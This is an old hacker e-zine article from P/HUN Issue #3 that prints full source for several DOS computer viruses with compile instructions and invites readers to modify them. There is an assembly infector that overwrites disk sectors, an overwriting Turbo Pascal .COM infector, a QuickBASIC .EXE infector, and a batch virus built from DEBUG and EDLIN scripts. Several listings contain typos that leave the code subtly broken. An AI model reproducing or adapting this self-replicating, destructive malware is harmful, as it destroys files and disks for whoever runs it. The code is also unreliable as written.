=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= P/HUN Issue #3, Volume 2: Phile #2 of 11 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Viruses: Assembly, Pascal, Basic & Batch
----------------------------------------
By Tesla Coil ][
[ I do not take any responsibility for any damages that may occur when ]
[ compiling viruses in this article. This article has been written to ]
[ promote knowledge into the amazing world of computer viruses. ]
Viruses can be written in practically every computer language known today.
Although most effective viruses have been written in Assembly.
Many of us think that viruses cannot be written in Basic due to its limited
ability. This is untrue. Basic has the capability of producing very effective
viruses if properly used. Combining assembly and basic could futher enhance
the effectiveness of the virus.
In this article we will examine some viruses written in Assembly, Pascal, Basic
and Batch written by B. Fix, R. Burger and M. Vallen which proved to be very
intresting to me.
Please use some caution handling these virus programs. Please use a separate
disks when you wish to compile.
Virus in Assembly Language
--------------------------
Most viruses out there have been written in assembly because assembly has the
unique ability to bypass operating system security.
Here is an example of a virus written under MS-DOS 2.1 and can obviously be
compiled in the later versions. The article contains remarks so as to further
explain the parts. Programmers may wish to delete those segments if desired.
***************************************************
; Program Virus
; Version 1.1
; Writter : R. Burger
; Created 1986
; This is a demonstration program for computer
; viruses. It has the ability to replace itself.
; and thereby modify other programs. Enjoy.
;**************************************************
Code Segment
Assume CS:Code
progr equ 100h
ORG progr
;**************************************************
; The three NOP's serve as the marker byte of the
; virus which allow it to identify a virus.
;**************************************************
MAIN:
nop
nop
nop
;**************************************************
; Initialize the pointers
;**************************************************
mov ax,00
mov es:[pointer],ax
mov es:[counter],ax
mov es:[disks],al
;**************************************************
; Get the selected drive
;**************************************************
mov ah,19h ;drive?
int 21h
;**************************************************
; Get the current path on the current drive
;**************************************************
mov cs:drive,al ;save drive
mov ah,47h ;dir?
mov dh,0
add al,1
mov dl,al ;in actual drive
lea si,cs:old_path ;
int 21h
;**************************************************
; Get the number of drives present. If only one
; is present, the pointer for the search order
; will be set to serach order + 6
;**************************************************
mov as,0eh ;how many disks
mov dl,0 ;
int 21h
mov al,01
cmp al,01 ;one drive
jnz hups3
mov al,06
hups3: mov ah,0
lea bx,search_order
add bx,ax
add bx,0001h
mov cs:pointer,bx
clc
;**************************************************
; Carry is set, if no more .COM's are found.
; Then, to avoid unnecessary work, .EXE files will
; be renamed to .COM files and infected.
; This causes the error message "Program to large
; to fit memory" when starting larger infected
; EXE programs.
;*************************************************
change_disk:
jnc no_name_change
mov ah,17h ;change .EXE to .COM
lea dx,cs:maske_exe
int 21h
cmp al,0ffh
jnz no_name_change ;.EXE found?
;****************************************************
; If neither .COM nor .EXE is found then sectors
; will be overwritten depending on the system time
; in milliseconds. This is the time of the complete
; "infection" of a storage medium. The virus can
; find nothing more to infect and starts its destruction
;*****************************************************
mov ah,2ch ; read system clock
int 21h
mov bx,cs:pointer
mov al,cs:[bx]
mov bx,dx
mov cx,2
mov dh,0
int 26h ; write crap on disk
;******************************************************
; Check if the end of the search order table has been
; reached . If so, end.
;******************************************************
no_name_change:
mov bx,cs:pointer
dec bx
mov cs:pointer,bx
mov dl,cs:[bx]
cmp dl,0ffh
jnz hups2
jmp hops
;****************************************************
; Get new drive from the search order table and
; select it .
;***************************************************
hups2:
mov ah,0eh
int 21h ;change disk
;***************************************************
; Start in the root directory
;***************************************************
mov ah,3bh ;change path
lea dx,path
int 21h
jmp find_first_file
;**************************************************
; Starting from the root, search for the first
; subdir. FIrst convert all .EXE files to .COM
; in the old directory
;**************************************************
find_first_subdir:
mov ah,17h ;change .exe to .com
lea dx,cs:maske_exe
int 21h
mov ah,3bh ;use root directory
lea dx,path
int 21h
mov ah,04eh ;search for first subdirectory
mov cx,00010001b ;dir mask
lea dx,maske_dir ;
int 21h ;
jc change_disk
mov bx,CS:counter
INC,BX
DEC bx
jz use_next_subdir
;*************************************************
; Search for the next subdirectory. If no more
; directories are found, the drive will be changed.
;*************************************************
find_next_subdir:
mov ah,4fh ; search for next subdir
int 21h
jc change_disk
dec bx
jnz find_next_subdir
;*************************************************
; Select found directory.
**************************************************
use_next_subdir:
mov ah,2fh ;get dta address
int 21h
add bx,1ch
mov es:[bx],'\` ;address of name in dta
inc bx
push ds
mov ax,es
mov ds,ax
mov dx,bx
mov ah,3bh ;change path
int 21h
pop ds
mov bx,cs:counter
inc bx
mov CS:counter,bx
;**************************************************
; Find first .COM file in the current directory.
; If there are none, search the next directory.
;**************************************************
find_first_file:
mov ah,04eh ;Search for first
mov cx,00000001b ;mask
lea dx,maske_com ;
int 21h ;
jc find_first_subdir
jmp check_if_ill
;**************************************************
; If program is ill(infected) then search for
; another other.
;**************************************************
find_next_file:
mov ah,4fh ;search for next
int 21h
jc find_first_subdir
;*************************************************
; Check is already infected by virus.
**************************************************
check_if_ill:
mov ah,3dh ;open channel
mov al,02h ;read/write
mov dx,9eh ;address of name in dta
int 21
mov bx,ax ;save channel
mov ah,3fh ; read file
mov ch,buflen ;
mov dx,buffer ;write in buffer
int 21h
mov ah,3eh ;close file
int 21h
;***************************************************
; This routine will search the three NOP's(no
; operation).If present there is already an infection.
; We must then continue the search
;****************************************************
mov bx,cs:[buffer]
cmp bx,9090h
jz find_next_file
;***************************************************
; This routine will BY PASS MS-DOS WRITE PROTECTION
; if present. Very important !
;***************************************************
mov ah,43h ;write enable
mov al,0
mov dx,9eh ;address of name in dta
int 21h
mov ah,43h
mov al,01h
and cx,11111110b
int 21h
;****************************************************
; Open file for read/write access.
*****************************************************
mov ah,3dh ;open channel
mov al,02h ;read/write
mov dx,9eh ;address of name in dta
int 21h
;****************************************************
; Read date entry of program and save for future
; use.
;****************************************************
mov bx,ax ;channel
mov ah,57h ;get date
mov al.0
int 21h
push cx ;save date
push dx
;****************************************************
; The jump located at address 0100h of the program
; will be saved for further use.
*****************************************************
mov dx,cs:[conta] ;save old jmp
mov cs:[jmpbuf],dx
mov dx,cs:[buffer+1] ;save new jump
lea cx,cont-100h
sub dx,cx
mov cs:[conta],dx
;*****************************************************
; The virus copies itself to the start of the file.
;*****************************************************
mov ah,57h ;write date
mov al,1
pop dx
pop cx ;restore date
int 21h
;*****************************************************
; Close the file.
;*****************************************************
mov ah,3eh ;close file
int 21h
;*****************************************************
; Restore the old jump address. The virus saves at
; address "conta" the jump which was at the start of
; the host program.
; This is done to preserve the executability of the
; host program as much as possible.
; After saving it still works with the jump address
; contained in the virus. The jump address in the
; virus differs from the jump address in memory.
;****************************************************
mov dx,cs:[jmpbuf] ;restore old jump
mov cs:[conta],dx
hops: nop
call use_old
;****************************************************
; Continue with the host program.
;****************************************************
cont db 0e9h ;make jump
conta dw 0
mov ah,00
int 21h
;***************************************************
; Reactivate the selected drive at the start of
; the program.
;***************************************************
use_old:
mov ah,0eh ;use old drive
mov dl,cs:drive
int 21h
;***************************************************
; Reactivate the selected path at the start of
; the program.
;***************************************************
mov ah,3bh ;use old drive
lea dx,old_path-1 ;get old path and backslash
int 21h
ret
search_order db 0ffh,1,0,2,3,0ffh,00,offh
pointer dw 0000 ;pointer f. search order
counter dw 0000 ;counter f. nth. search
disks db 0 ;number of disks
maske_com db "*.com",00 ;search for com files
maske_dir db "*",00 ;search for dir's
maske_exe db offh,0,0,0,0,0,00111111b
db 0,"????????exe",0,0,0,0
db 0,"????????com",0
maske_all db offh,0,0,0,0,0,00111111b
db 0,"???????????",0,0,0,0
db 0,"????????com",0
buffer equ 0e00h ;a safe place
buflen equ 230h ;lenght of virus!!!!
;carefull
;if changing!!!!
jmpbuf equ buffer+buflen ;a safe place for jmp
path db "\",0 ;first place
drive db 0 ;actual drive
back_slash db "\"
old_path db 32 dup (?) ;old path
code ends
end main
[ END OF THIS VIRUS PROGRAM ]
Virus in Pascal
---------------
Pascal is another high level language that can produce eye popping computer
viruses. Especially when the usage of Turbo Pascal is involved.
The virus below was available through various bulletin boards for
a while.
{
------------------------------------------------------------------
Number One
Please handle this virus with care!!!!!!!!!!! [Deadly Demo]
Number One infects all .COM - file's name will be displayed
That file has been overwritten with Number Ones's program code and
is not reconstructible! If all files are infected or or no .COM
files are found, Number one gives you a .
Files may be protected against infections of Number One by
setting the Read ONLY attribute.
Written 10.3.87 by M.Vallen (Turbo Pascal 3.01A)
------------------------------------------------------ }
}
{C-}
{U-}
{I-} { Wont allow a user break, enable IO check}
{ -- Constants --------------------------------------- }
Const
VirusSize = 12027; {Number One's code size}
Warning :String[42] {Warning message}
= 'This file has been infected ny Number One!';
{ -- Type declarations------------------------------------- }
Type
DTARec =Record {Data area for file search }
DOSnext :Array[1..21] of Byte;
Attr : Byte;
Ftime,
FDate,
FLsize,
FHsize : Integer;
FullName: Array[1..13] of Char;
End;
Registers = Record {Register set used for file search }
Case Byte of
1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte);
End;
{ -- Variables--------------------------------------------- }
Var
{ Memory offset program code }
ProgramStart : Byte absolute Cseg:$100;
{ Infected marker }
MarkInfected : String[42] absolute Cseg:$180;
Reg : Registers; { Register set }
DTA : DTARec; { Data area }
Buffer : Array[Byte] of Byte; { Data buffer }
TestID : String[42]; { To recognize infected files }
UsePath : String[66]; { Path to search files }
{ Lenght of search path }
UsePathLenght: Byte absolute UsePath;
Go : File; { File to infect }
B : Byte; { Used }
{ -- Program code------------------------------------------ }
Begin
WriteLn(Warning); { Display warning message }
GetDir(0, UsePath); { get current directory }
if Pos('\', UsePath) <> UsePathLenght then
UsePath := UsePath + '\';
UsePath := UsePath + '*.COM'; { Define search mask }
Reg.AH := $1A; { Set data area }
Reg.DS := Seg(DTA);
Reg.DX := Ofs(DTA);
MsDos(Reg);
UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 }
Reg.AH := $4E;
Reg.DS := Seg(UsePath);
Reg.DX := Ofs(UsePath[1]);
Reg CX := $ff; { Set attribute to find ALL files }
MsDos(Reg); { Find first matching entry }
IF not Odd(Reg.Flags) Then { If a file found then }
Repeat
UsePath := DTA.FullName;
B := Pos(#0, UsePath);
If B > 0 then
Delete(UsePath, B, 255); { Remove garbage }
Assign(Go, UsePath);
Reset(Go);
If IOresult = 0 Then { If not IO error then }
Begin
BlockRead(Go, Buffer, 2);
Move(Buffer[$80], TestID, 43);
{ Test if file already ill(Infected) }
If TestID <> Warning Then { If not then ... }
Begin
Seek (Go, 0);
{ Mark file as infected and .. }
MarkInfected := Warning;
{ Infect it }
BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7);
Close(Go);
{ Say what has been done }
WriteLn(UsePath + 'infected.');
Halt; {.. and halt the program }
End;
Close(Go);
End;
{ The file has already been infected, search next. }
Reg.AH := $4F;
Reg.DS := Seg(DTA);
Reg.DX := Ofs(DTA);
MsDos(Reg);
{ ......................Until no more files are found }
Until Odd(Red.Flags);
Write(`'); {Give a smile }
End.
Although this is a primitive virus its effective.In this virus only the .COM
files are infected. Its about 12K and it will change the date entry.
Viruses in Basic
----------------
Basic is great language and often people think of it as a limited language
and will not be of any use in creating something like a virus. Well you are
really wrong. Lets take a look at a Basic Virus created by R. Burger in 1987.
This program is an overwritting virus and uses (Shell) MS-DOS to infect .EXE
files.To do this you must compile the source code using a the Microsoft
Quick-BASIC.Note the lenght of the compiled and the linked .EXE file and edit
the source code to place the lenght of the object program in the LENGHTVIR
variable. BV3.EXE should be in the current directory, COMMAND.COM must be
available, the LENGHTVIR variable must be set to the lenght of the linked
program and remember to use /e parameter when compiling.
10 REM ** DEMO
20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED **
30 REM ** BASIC DOESNT SUCK
40 REM ** NO KIDDING
50 ON ERROR GOTO 670
60 REM *** LENGHTVIR MUST BE SET **
70 REM *** TO THE LENGHT TO THE **
80 REM *** LINKED PROGRAM ***
90 LENGHTVIR=2641
100 VIRROOT$="BV3.EXE"
110 REM *** WRITE THE DIRECTORY IN THE FILE "INH"
130 SHELL "DIR *.EXE>INH"
140 REM ** OPEN "INH" FILE AND READ NAMES **
150 OPEN "R",1,"INH",32000
160 GET #1,1
170 LINE INPUT#1,ORIGINAL$
180 LINE INPUT#1,ORIGINAL$
190 LINE INPUT#1,ORIGINAL$
200 LINE INPUT#1,ORIGINAL$
210 ON ERROR GOT 670
220 CLOSE#2
230 F=1:LINE INPUT#1,ORIGINAL$
240 REM ** "%" IS THE MARKER OF THE BV3
250 REM ** "%" IN THE NAME MEANS
260 REM ** INFECTED COPY PRESENT
270 IF MID$(ORIGINAL$,1,1)="%" THEN GOTO 210
280 ORIGINAL$=MID$(ORIGINAL$,1,13)
290 EXTENSIONS$=MID$(ORIGINAL,9,13)
300 MID$(EXTENSIONS$,1,1)="."
310 REM *** CONCATENATE NAMES INTO FILENAMES **
320 F=F+1
330 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13 THEN
GOTO 350
340 GOTO 320
350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$
360 ON ERROR GOTO 210
365 TEST$=""
370 REM ++ OPEN FILE FOUND +++
380 OPEN "R",2,OROGINAL$,LENGHTVIR
390 IF LOF(2) < LENGHTVIR THEN GOTO 420
400 GET #2,2
410 LINE INPUT#1,TEST$
420 CLOSE#2
431 REM ++ CHECK IF PROGRAM IS ILL ++
440 REM ++ "%" AT THE END OF THE FILE MEANS..
450 REM ++ FILE IS ALREADY SICK ++
460 REM IF MID$(TEST,2,1)="%" THEN GOTO 210
470 CLOSE#1
480 ORIGINALS$=ORIGINAL$
490 MID$(ORIGINALS$,1,1)="%"
499 REM ++++ SANE "HEALTHY" PROGRAM ++++
510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$
520 SHELL C$
530 REM *** COPY VIRUS TO HEALTHY PROGRAM ****
540 C$="COPY "+VIRROOT$+ORIGINAL$
550 SHELL C$
560 REM *** APPEND VIRUS MARKER ***
570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13
580 WRITE#1,ORIGINALS$
590 CLOSE#1
630 REM ++ OUYPUT MESSAGE ++
640 PRINT "INFECTION IN " ;ORIGIANAL$; " !! BE WARE !!"
650 SYSTEM
660 REM ** VIRUS ERROR MESSAGE
670 PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!":SYSTEM
680 END
This basic virus will only attack .EXE files. After the execution you will
see a "INH" file which contains the directory, and the file %SORT.EXE.
Programs which start with "%" are NOT infected ,they pose as back up copies.
Batch Viruses
-------------
Whoever thought that viruses could be in BATCH file.This virus which we
are about to see makes use of MS-DOS operating system. This BATCH virus
uses DEBUG & EDLIN programs.
Name: VR.BAT
echo = off ( Self explanatory)
ctty nul ( This is important. Console output is turned off)
path c:\msdos ( May differ on other systems )
dir *.com/w>ind ( The directory is written on "ind" ONLY name entries)
edlin ind<1 ( "Ind" is processed with EDLIN so only file names appear)
debug ind<2 ( New batch program is created with debug)
edlin name.bat<3 ( This batch goes to an executable form because of EDLIN)
ctty con ( Console interface is again assigned)
name ( Newly created NAME.BAT is called.
In addition to file to this Batch file,there command files,here named 1,2,3
Here is the first command file:
-------------------------------
Name: 1
1,4d ( Here line 1-4 of the "IND" file are deleted )
e ( Save file )
Here is the second command file:
--------------------------------
Name: 2
m100,10b,f000 (First program name is moved to the F000H address to save)
e108 ".BAT" (Extention of file name is changed to .BAT)
m100,10b,f010 (File is saved again)
e100"DEL " (DEL command is written to address 100H)
mf000,f00b,104 (Original file is written after this command)
e10c 2e (Period is placed in from of extension)
e110 0d,0a (Carrige return+ line feed)
mf010,f020,11f ( Modified file is moved to 11FH address from buffer area)
e112 "COPY \VR.BAT" ( COPY command is now placed in front of file)
e12b od,0a (COPY command terminated with carriage return + lf)
rxc ( The CX register is ... )
2c ( set to 2CH)
nname.bat ( Name it NAME.BAT)
w ( Write )
q ( quit )
The third command file must be printed as a hex dump because it contains
2 control characters (1Ah=Control Z) and this is not entirely printable.
Hex dump of the third command file:
-----------------------------------
Name: 3
0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
1 , 1 ? . . n y y y y y y y
0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79
y . 2 , ? ? r . . n n y y y
0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
y y y y . E . . . . . . . . .
In order for this virus to work VR.BAT should be in the root. This program only
affects .COM files.
End Note
--------
All these viruses can be modified to suit your needs. If anyone has seen any
intresting viruses please contact me at The Hacker's Den BBS.
Suggested readings:
Computer Viruses: A high Tech Disease by Abacus
2600 Magazine: Volume 5, Number 2
-TC][-
(
geocities.com/vienna)